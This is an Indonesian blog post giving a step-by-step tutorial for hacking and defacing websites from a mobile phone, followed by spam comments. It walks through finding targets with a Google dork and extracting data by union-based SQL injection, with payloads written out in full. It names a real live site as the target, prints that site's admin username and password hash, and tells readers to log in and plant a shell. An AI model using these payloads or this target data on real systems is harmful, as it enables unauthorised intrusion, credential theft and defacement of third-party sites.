Breaking News
Loading...
Kamis, 14 November 2013

Cara Hack/Deface Website with HP


Ok kita balik lagi ketopik kita Tutorial Hack/Deface Website with HandPhone,

1. Hp agan harus suport opera mini bisa hp JAVA atau SYMBIAN atau apalah
2. Gunakan opera mini versi 4 ke atas.
3. Masukin Dork'ny kembah google. Dork: inurl:readnews.php?id=
4. Muncul banyak situs pada satu layar anda, coba anda cari satu persatu, mana yang vuln dan tidak.
5. Saya pilih situs ini http://mostalocalcouncil.com/readnews.php?id=36, selanjutnya beri tanda petik ' pada akhir url.
dan terjadi error, Berarti situs tersebut vuln atau bisa di hack
6. Sekarang kita cari tahu berapa kolom database nya. Caranya dengan menghapus tanda ' dan menggantinya dengan +order+by+1--
gunakan tanda + untuk mengganti spasi , karena opmin tidak menerima url berspasi sperti browser pc
disini terjadi normal kembali dan selanjutnya kita paksa si situs untuk menunjukan berapa jumlah kolom database nya.
Dengan cara : ganti angka 1 dengan angka 10, jika terjadi eror maka urutkan ke angka yang lebih kecil 9,8,7,6 hingga index nörmal , dan sebaliknya jika tidak terdapat error maka urutkan ke angka yang lebih tinggi.
Kita percepat saja, Kolom database si situs ternyata berakhir di angka 6. Jadi yang kita ambil adalah angka sebelumnya yaitu 5.
7. Langsung saja , ganti perintah =36+order+by+5-- dengan =-36+union+select+1,2,3,4,5-- dan nomor togel pun muncul
8. Jadi sekarang kita ganti angka 2 di url dengan perintah version() untuk melihat versi database si situs.
Dan muncul lah angka 5.0.96-community atau apalah yg pnting Versi 5 keatas
9. Ganti tulisan version() di url dengan group_concat(table_name), dan +from+information_schema.tables+where+table_schema=database()--
dan muncul lah banyak category sepert: adverts,announcements,articles,categories,news,pages,publications,security,users
Selanjutnya kita cari column dari nama table yg ada hubungannya dengan user+password admin,
jadi kita ambil table users tapi sebelumnya kata users tersebut kita convert dulu
ke HEXA [ CLICK HERE ]
Ketik : Users atau nama table apalah lalu Convert! hasilnya : 7573657273
Selanjutnya adalah ubah group_concat(table_name) menjadi group_concat(column_name) dan +from+information_schema.tables+where+table_schema=database()-- menjadi +from+information_schema.columns+where+table_name=0xHEXA--
Ganti HEXA dengan hasil convert tadi: 7573657273 tambahkan 0x didepan HEXA agar server dapat mengetahui bahwa itu telah diconvert ke HEXA
muncul kolom: id,username,password,name,email,lastlogin,ip
Pilih kolom username dan password aja ya sob. Untuk melihat isi dari kolom tersebut ganti group_concat(column_name) menjadi group_concat(username,0x3a,password) dan ganti +from+information_schema.columns+where+table_name=0x7573657273-- menjadi +from+users-- karna yang barusan kita masukkin adalah table users
muncul user dan password website tersebut: admin:68b752263e82b3b1ee1ffe739ee0eec1
Selanjut'ny tinggal kita ubah password yang acak kadut 68b752263e82b3b1ee1ffe739ee0eec1 [ CLICK HERE ]
Cari login situsnya dan tanam shell Congratulation!
> Untuk pembelajaran ane saranin pakai terget seperti yang dicontohin: http://mostalocalcouncil.com/readnews.php?id=36


5 komentar:

  1. http://deanara16.blogspot.com/
    Saling komen dan follow gan
    langsung Di follow and koment sekarang gan..

    BalasHapus
    Balasan
    1. Trimakaish gan , telah berkunjung. maju terus bloger indonesia (h)

      Hapus
    2. Cara Hack/Deface Website With Hp - Laskar Al-Azhar >>>>> Download Now

      >>>>> Download Full

      Cara Hack/Deface Website With Hp - Laskar Al-Azhar >>>>> Download LINK

      >>>>> Download Now

      Cara Hack/Deface Website With Hp - Laskar Al-Azhar >>>>> Download Full

      >>>>> Download LINK A7

      Hapus
  2. Sangat bermanfaat artikel-artikelnya Min,terus berkarya salam sukses bossku.
    o iya mohon izin nitip ya.
    https://zenwriting.net/

    BalasHapus
  3. Cara Hack/Deface Website With Hp - Laskar Al-Azhar >>>>> Download Now

    >>>>> Download Full

    Cara Hack/Deface Website With Hp - Laskar Al-Azhar >>>>> Download LINK

    >>>>> Download Now

    Cara Hack/Deface Website With Hp - Laskar Al-Azhar >>>>> Download Full

    >>>>> Download LINK uY

    BalasHapus

Berkomentarlah sebaik mungkin , . . . dengan berpedoman pada peraturan yang anda buat pada site anda sendiri dan atau peraturan yang ada pada umumnya. Kami sangat menghargai pendapat anda. terima kasih.

Copyright © 2014 LASKAR AL-AZHAR All Right Reserved